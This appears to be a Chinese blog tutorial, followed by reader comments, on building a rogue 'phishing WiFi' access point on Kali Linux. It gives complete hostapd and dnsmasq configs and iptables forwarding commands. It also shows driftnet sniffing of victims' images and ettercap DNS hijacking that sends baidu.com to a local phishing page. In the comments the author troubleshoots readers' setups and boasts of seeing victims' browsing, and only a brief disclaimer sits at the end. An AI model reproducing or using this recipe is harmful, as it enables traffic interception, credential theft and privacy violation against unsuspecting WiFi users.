如何在kali下快速搭建钓鱼WiFi呢?全网最简单最详细的教程核能来袭。一起来看看吧。
准备
- USB无线网卡(推荐8187 3070)
- hostapd dnsmasq apache2
kali2020(最新版)
配置无线网卡
在终端执行
ifconfig
查看是否有wlan0
如果存在,我们需要激活为监听模式。执行命令:
airmon-ng start wlan0
配置hostapd
在终端执行
vim hostapd.conf
写入下面内容
interface=wlan0mon
driver=nl80211
ssid=Chinanet #无线名称 随意即可
hw_mode=g
channel=6
macaddr_acl=0
ignore_broadcast_ssid=0
配置dnsmasq文件
终端执行
vim dnsmasq.conf
写入内容如下:
interface=wlan0mon
dhcp-range=192.168.1.2, 192.168.1.30, 255.255.255.0, 12h
dhcp-option=3, 192.168.1.1
dhcp-option=6, 192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1
配置防火墙和端口转发
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface wlan0mon -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward
这样做的目的是保证我们的鱼儿能够正常上网。
给无线网卡分配IP地址
ifconfig wlan0mon up 192.168.1.1 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
启动钓鱼热点
hostapd hostapd.conf
这样我们便可以看到有一个 china-net
的热点,但是不能连接,不要着急,我们启动dnsmasq即可。
dnsmasq -C dnsmasq.conf -d
这样,我们的热点便可以正常连接并上网了。
左边为连接的设备,右边有设备访问的网站信息。
高级操作
嗅探目标图片
在终端执行
driftnet -i wlan0mon
便可以看到目标访问的站点图片信息。
中间人攻击
域名重定向
修改 /etc/ettercap/etter.dns
文件,添加内容如下:
baidu.com A 192.168.1.1
*.baidu.com A 192.168.1.1
www.baidu.com PTR 192.168.1.1
即,当我们访问百度,自动跳转到本地。
开启本地 apache
service apache2 start
将做好的钓鱼页面放到 /var/www/html
目录下,然后终端执行 ettercap -G
利用 ettercap
进行DNS劫持,具体做法这里不再诉述。
附html钓鱼页面
当然,你也可以对目标进行数据包的捕获和分析,我们这里也不再说了。
视频演示
最后还得要重新声明下:
本文仅供学习和研究,请勿非法攻击他人,造成后果请自负!!!
🐶填个坑
有不少人搭建完成后,反应上不了网,是因为dns冲突了。如你家的路由器的网段是192.168.1.1/24
而在dns的配置文件中dhcp-option=3, 192.168.1.1
这样会冲突,解决办法很简单,把192.168.1.1
改成其他网段就行了,如192.168.5.1
,但是后面的规则也要改。最简单的方法就是登陆路由器,将lan
口地址192.168.1.1
改掉就行了!
27 comments
执行dnsmasq -C dnsmasq.conf -d的时候报错误这么解决dnsmasq: failed to bind DHCP server socket: Address already in use
笔记本也需要无线网卡吗?
为什么我用ettercap扫描到的只有一个IP地址(目标机),而我的网关没有
你看下你的网段
按照文章的步骤做完了 ,但是手机连上做出来的wifi后不能访问百度 。咋回事
PC本机能正常上网不,不要开启中间人攻击,试下能访问不!
现在能上网,但是开启ettercap之后就不能上网了 ,重定向dns劫持操作也没能成功
ettercap只对http网站有用,你看下ettercap的配置文件。
现在就是正常搭建的wifi没问题 ,开启ettercap就不生效了 。能加个微信吗 哥
微信 bbskali
现在能上网,但是开启ettercap之后就不行了 ,重定向也没成功
非常感谢,在我的kali中终于搭建成功了!找了好多教程都不行。这篇完美解决!不容易啊!😋😋
钓鱼WiFi建立后还可以做什么?
查看对方所有的上网信息!
打开ettercap后是使用wlan0mon进行嗅探吗,嗅探的结果能找到受害机,然后添加到target1,但是好像找不到网关,然后激活dns欺骗,然后手机没网了。。。。
把路由设置为target2
把路由设置为target2
我扫描只能扫到一个ip,就是我手机正在用的ip,还有,我在手机上看,钓鱼wifi显示的是不可上网,但是连上后能上网
因为你的kali可以上网,所以热点就能上网!这个和手机开热点的原理是一样的!
重点在钓鱼wifi显示的是不可上网,那鱼都不上钩了
你设置成开放WIFI试下
就是没有密码的呀
你只开启WiFi热点,先不要开启dns劫持试下。因为手机连接WiFi候,先通过ping检查网络是否可用。
我这么做了发现好像还是连不上网,反倒是之前没有开启mon模式的时候可以联网
大佬在使用dnsmasq -C dnsmasq.conf -d时,报错:
dnsmasq: cannot read dnsmasq.conf: 没有那个文件或目录
这个该怎么处理啊
前面有个命令是错的,少了.conf
vim dnsmasq.conf